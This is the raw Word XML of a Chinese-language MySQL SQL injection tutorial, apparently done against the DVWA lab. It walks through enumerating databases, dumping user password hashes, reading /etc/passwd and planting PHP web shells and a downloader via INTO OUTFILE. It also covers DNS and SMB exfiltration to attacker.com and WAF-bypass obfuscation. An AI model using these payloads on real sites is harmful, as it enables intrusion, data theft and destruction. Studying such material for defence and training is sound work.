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        SQL注入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>SQL注入，就是利用现有的应用程序的特性，攻击者通过在web表单，url等可以输入数据的地方恶意插入SQL语句一并原有SQL语句被数据库执行，达到编写程序时意料之外的攻击行为。以下主要对MySQL注入的相关技术进行探讨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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24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一：判断注入点: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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24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攻击者要先对注入漏洞进行判断.攻击者通过构造一些测试语句向服务器提交请求,服务器分析结果后返回给客户端,如果符合预期结果,则说明存在漏洞,如果不符合预期结果,就再次构造测试语句测试注入点.常用的测试语句有字符串型和数字型的。我们知道；SELECT * FROM Articles WHERE id = '1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''为true,然而，SELECT * FROM Articles WHERE id = '1''，为false，为什么？Sql语法要求对于字符串的输入中特殊字符（单引号，双引号或右斜杠）输入要成对出现。那么，如何去判断是否存在注入点：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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24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加入单引号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提交，结果：如果出现错误提示，那么就说明可能存在漏洞，进一步注入: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对于数字型的，由逻辑判断有以下的规则：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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3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 1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 0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查询无效，网站返回缺少内容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 true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 false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查询无效，网站返回缺少内容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1-false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如果易受攻击返回1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1 -true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如果易受攻击返回0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1*56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如果易受攻击返回56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1*56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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如果不易受攻击返回1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那么，我们可以进行了下列的注入语句：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 1=1;and 2=2;如果两条语句返回不同的页面，则说明存在注入漏洞。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对于字符型的，遵循字符串的配对原则：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4"/>
        <w:tblW w:w="5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3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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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查询无效，网站返回缺少内容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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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查询无效，网站返回缺少内容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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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查询无效，网站返回缺少内容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\\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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查询有效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注入后注释掉剩余的查询语句部分；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当我们注入后，为了遵循sql的语法规则，或为了成功进一步注入，必须注释掉我们不需要的部分，下列的都可以用于Mysql语句的注释：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4"/>
        <w:tblW w:w="6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4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 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C-style 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--（空格）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 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;%00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`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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Backtick(只能在用作别名时用于结束查询）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测试版本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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24" w:rightChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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基本语句：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VERSION()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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6"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@VERSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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6"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>@@GLOBAL.VERSION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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24" w:rightChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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Courier" w:hAnsi="Courier" w:cs="Courier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测试语句如下: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/>
        <w:ind w:right="24" w:rightChars="0"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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Courier" w:hAnsi="Courier" w:cs="Courier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得出数据库的版本为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/>
        <w:ind w:left="-336" w:leftChars="0" w:right="24" w:rightChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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4243070" cy="2232025"/>
            <wp:effectExtent l="0" t="0" r="889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四：获取数据库凭据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</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="6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80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" w:hAnsi="Courier" w:cs="Courier"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:i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user(),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>current_user(), current_user, system_user(), session_user()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返回当前查询的用户名：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01440" cy="20421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五：获取数据库名称：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我们可以通过 select database()select schema()或语句来获取当前网站所使用的数据库名字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73780" cy="1691640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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2811780" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="3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由于本次实验的MySQL版本&gt;5.0,有个默认数据库information_sschema,里面存放着所有数据库的信息，通过这个数据库，我们可以：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（1）爆库：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579620" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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爆表：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="190" w:firstLineChars="1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语句：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select TABLE_NAME  from  information_schema.TABLES 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limit 1,5,其中limit 1,5表示从第一个位置之后的5个数目。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0" w:firstLine="210" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4792980" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0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爆字段（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table_schema、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shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name、column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i w:val="0"/>
          <w:iCs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三个字段都在information_schema.columns)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50080" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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此外，我们既然得到“dvwa”数据库名，我们可以查询其中的表；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1883410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="3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我们可以看到，这里面有一个users表，我们可以继续通过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t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>able_name以及table_schema来查column_name来构造注入语句：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2221230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="539750" cy="152400"/>
                <wp:effectExtent l="12700" t="12700" r="26670" b="1778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5315" y="9277350"/>
                          <a:ext cx="5397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45pt;margin-top:174.9pt;height:12pt;width:42.5pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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F&#10;/Dzl2AAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACH&#10;TuJAECAGK10CAACUBAAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYA&#10;BgBZAQAA9gUAAAAA&#10;">
                <v:fill on="f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1783080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="374650" cy="190500"/>
                <wp:effectExtent l="12700" t="12700" r="24130" b="254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9915" y="8877300"/>
                          <a:ext cx="37465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45pt;margin-top:140.4pt;height:15pt;width:29.5pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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rl&#10;FAnXAAAACwEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO&#10;4kBROWwaXQIAAJQEAAAOAAAAAAAAAAEAIAAAACYBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAG&#10;AFkBAAD1BQAAAAA=&#10;">
                <v:fill on="f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873625" cy="2599055"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="3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可以看到，其中出现了user,name的信息字段。接下来我们就可以获取到注册登陆用户的信息破解了。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1228725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2673350" cy="279400"/>
                <wp:effectExtent l="12700" t="12700" r="2667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6180" y="2539365"/>
                          <a:ext cx="267335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pt;margin-top:96.75pt;height:22pt;width:210.5pt;z-index:251660288;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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0&#10;7o0g2AAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACH&#10;TuJAbTyxU10CAACVBAAADgAAAAAAAAABACAAAAAnAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYA&#10;BgBZAQAA9gUAAAAA&#10;">
                <v:fill on="f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489960" cy="280416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可以看到有5个用户，且密码是经过加密的，不过，我们可以通过”CWD5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破解，我们选取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gordonb用户破解其密码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1550035"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445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进入Brute Force一项，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1463675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="482600" cy="158750"/>
                <wp:effectExtent l="12700" t="12700" r="22860" b="266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1180" y="7925435"/>
                          <a:ext cx="48260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4pt;margin-top:115.25pt;height:12.5pt;width:38pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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JYrJdgAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgA&#10;h07iQL9I/jZeAgAAlAQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAG&#10;AAYAWQEAAPcFAAAAAA==&#10;">
                <v:fill on="f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575560" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="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获取当前的主机：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语句：select @@hostname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04260" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="762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获取服务器MAC 地址：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语句：UUID()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37660" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="762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通用唯一标识符是128位数字，其中最后12位数字由接口MAC地址形成。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确定列数；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语句：GROUP/ORDER BY n+1;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笔记：继续增加数字，直到得到错误的回复。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尽管GROUP BY和ORDER BY在SQL中具有不同的功能，但它们都可以以完全相同的方式用于确定查询中的列数。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79420" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="7620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当继续增加到3时，爆出下面的错误信息，说明查询的列数只有两列。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96845" cy="840740"/>
            <wp:effectExtent l="0" t="0" r="635" b="12700"/>
            <wp:docPr id="4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避免直接使用用户名：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当输入用户名，比如：admin,将字符串转换为十六进制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50080" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="3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选择'a''d''mi''n';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SELECT CONCAT（'a'，'d'，'m'，'i'，'n'）;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SELECT CONCAT_WS（''，'a'，'d'，'m'，'i'，'n'）;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SELECT GROUP_CONCAT（'a'，'d'，'m'，'i'，'n'）;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90900" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="4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笔记：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CONCAT()如果任何参数为NULL，则返回NULL。而是使用CONCAT_WS()。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第一个参数CONCAT_WS()定义了其余参数的分隔符。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00400" cy="1584960"/>
            <wp:effectExtent l="0" t="0" r="0" b="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十一：条件陈述：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="7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9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IF()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IFNULL()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NULLIF()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3421380" cy="1661160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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十二．文件操作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以下查询可帮助确定给定用户的FILE权限。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="84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98"/>
        <w:gridCol w:w="1049"/>
        <w:gridCol w:w="5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98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SELECT file_priv FROM mysql.user WHERE user = 'username';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1049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alibri" w:hAnsi="Calibri" w:cs="Calibr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Root privileges required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="579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MySQL 4/5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798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SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%';</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1049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No privileges required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="579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MySQL 5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如果用户具有FILE权限，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过sql注入可以（1）获取服务器本地文件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语句:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LOAD_FILE（）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LOAD_FILE（ '/ etc / passwd' ） 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LOAD_FILE（ 0x2F6574632F706173737764 ） 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笔记：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文件必须位于服务器主机上。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LOAD_FILE（）的基本目录是 @@datadir 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该文件必须是MySQL用户可读的。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文件大小必须小于max_allowed_packet。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默认大小为 @@max_allowed_packet 1047552字节。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基本语句：INTO OUTFILE/DUMPFILE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例子：先写一个php的脚本文件，内容如下：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/>
        <w:ind w:left="24" w:right="24" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT '&lt;? system($_GET[\'c\']); ?&gt;' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="CC0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>INTO OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'/var/www/shell.php';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然后登陆网站：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/>
        <w:ind w:left="24" w:right="24" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost/shell.php?c=cat%20/etc/passwd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接下来写下载器：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/>
        <w:ind w:left="24" w:right="24" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT '&lt;? fwrite(fopen($_GET[f], \'w\'), file_get_contents($_GET[u])); ?&gt;'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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="CC0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>INTO OUTFILE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6"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'/var/www/get.php'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接下来进入：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/>
        <w:ind w:left="24" w:right="24" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://localhost/get.php?f=shell.php&amp;u=http://localhost/c99.txt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文件无法覆盖 INTO OUTFILE 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INTO OUTFILE 必须是查询中的最后一个语句。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无法对路径名进行编码，因此需要引号。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十三：DNS请求：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Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT LOAD_FILE(CONCAT('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));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SMB求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="48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39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" w:hAnsi="Courier" w:cs="Courier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kern w:val="0"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt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十四：堆叠查询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堆叠查询注入：堆叠查询可以执行多条SQL语句，语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点，在第二条语句中构造自己要执行的语句。与union不同的是，它执行的语句类型不单单是查询语句，还可以是任意的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用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。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6450" cy="1311275"/>
            <wp:effectExtent l="0" t="0" r="11430" b="14605"/>
            <wp:docPr id="5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660650"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="51" name="图片 51" descr="img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img_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3325" cy="1143635"/>
            <wp:effectExtent l="0" t="0" r="635" b="14605"/>
            <wp:docPr id="55" name="图片 55" descr="img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mg_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372995"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="56" name="图片 56" descr="img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4991735" cy="1692910"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:docPr id="57" name="图片 57" descr="img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img_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444750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="58" name="图片 58" descr="img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348740"/>
            <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
            <wp:docPr id="59" name="图片 59" descr="img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img_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1050" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="11430" b="9525"/>
            <wp:docPr id="60" name="图片 60" descr="img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img_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特定于Mysql的代码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MySQL允许您指定感叹号后的版本号。仅当版本大于或等于指定的版本号时，才会执行注释中的语法。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UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>返回版本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SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可绕过WAF/IDS。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十六.模糊和混淆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1.以下字符可用作空格。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3"/>
        <w:tblW w:w="34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5"/>
        <w:gridCol w:w="2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09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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alibri" w:hAnsi="Calibri" w:cs="Calibr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水平标签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0A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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新队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0B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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垂直标签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0℃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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新的一页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0D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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回程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A0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236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不间断的空间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5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2363" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D5D5D5" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="D5D5D5" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="D5D5D5" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="D5D5D5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空间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2.空格也可用做括号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，右括号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代替。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3.and/or后允许的中介字符：空格，+，=，~,!,@.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337560" cy="2933065"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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19500" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="762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47060" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="762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145280" cy="1889760"/>
            <wp:effectExtent l="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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4389120" cy="2308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01440" cy="2042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914900" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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9520" cy="2941320"/>
            <wp:effectExtent l="0" t="0" r="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089150"/>
            <wp:effectExtent l="0" t="0" r="0" b="1397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4260" cy="16840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137660" cy="19278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3573780" cy="16916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733800" cy="165354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0400" cy="158496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89960" cy="156210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3421380" cy="1661160"/>
            <wp:effectExtent l="0" t="0" r="762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61360" cy="165354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79420" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="762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051685"/>
            <wp:effectExtent l="0" t="0" r="3810" b="571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union select 0x61646D696E`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4091940" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="7620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07080" cy="1455420"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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9480" cy="164592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459480" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="76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22320" cy="1737360"/>
            <wp:effectExtent l="0" t="0" r="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26080" cy="1341120"/>
            <wp:effectExtent l="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BB664"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8C3BB66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2EBE64B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E2EBE64B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444EFFA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0444EF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8465221"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="08465221"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="（%1)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4">
    <w:nsid w:val="1EC07BA0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1EC07B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52E1B71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="252E1B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BE17DEA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3BE17DEA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42C7ECDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42C7E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5D1968B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="55D1968B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="614F48B7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="614F48B7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="15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6BA0D0C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BA0D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C2"/>
    <w:rsid w:val="00041C98"/>
    <w:rsid w:val="000D45A8"/>
    <w:rsid w:val="001C1FE0"/>
    <w:rsid w:val="001F4FD4"/>
    <w:rsid w:val="002100C6"/>
    <w:rsid w:val="00222767"/>
    <w:rsid w:val="006E0257"/>
    <w:rsid w:val="0076016C"/>
    <w:rsid w:val="007A6D5D"/>
    <w:rsid w:val="00883495"/>
    <w:rsid w:val="009871C2"/>
    <w:rsid w:val="00A50E64"/>
    <w:rsid w:val="00B36F3F"/>
    <w:rsid w:val="00E52E62"/>
    <w:rsid w:val="03EE0709"/>
    <w:rsid w:val="0A5849BF"/>
    <w:rsid w:val="0D1559B9"/>
    <w:rsid w:val="13B672D7"/>
    <w:rsid w:val="1D7A4548"/>
    <w:rsid w:val="222F28C4"/>
    <w:rsid w:val="25AB75D9"/>
    <w:rsid w:val="26325A66"/>
    <w:rsid w:val="27373151"/>
    <w:rsid w:val="29287068"/>
    <w:rsid w:val="29C9128A"/>
    <w:rsid w:val="2C11436F"/>
    <w:rsid w:val="2E7275A7"/>
    <w:rsid w:val="31BC6829"/>
    <w:rsid w:val="321142EB"/>
    <w:rsid w:val="3A1A1B2F"/>
    <w:rsid w:val="3D9B5916"/>
    <w:rsid w:val="3EB868B6"/>
    <w:rsid w:val="40F64BA3"/>
    <w:rsid w:val="41BD62C4"/>
    <w:rsid w:val="43020545"/>
    <w:rsid w:val="44F7701C"/>
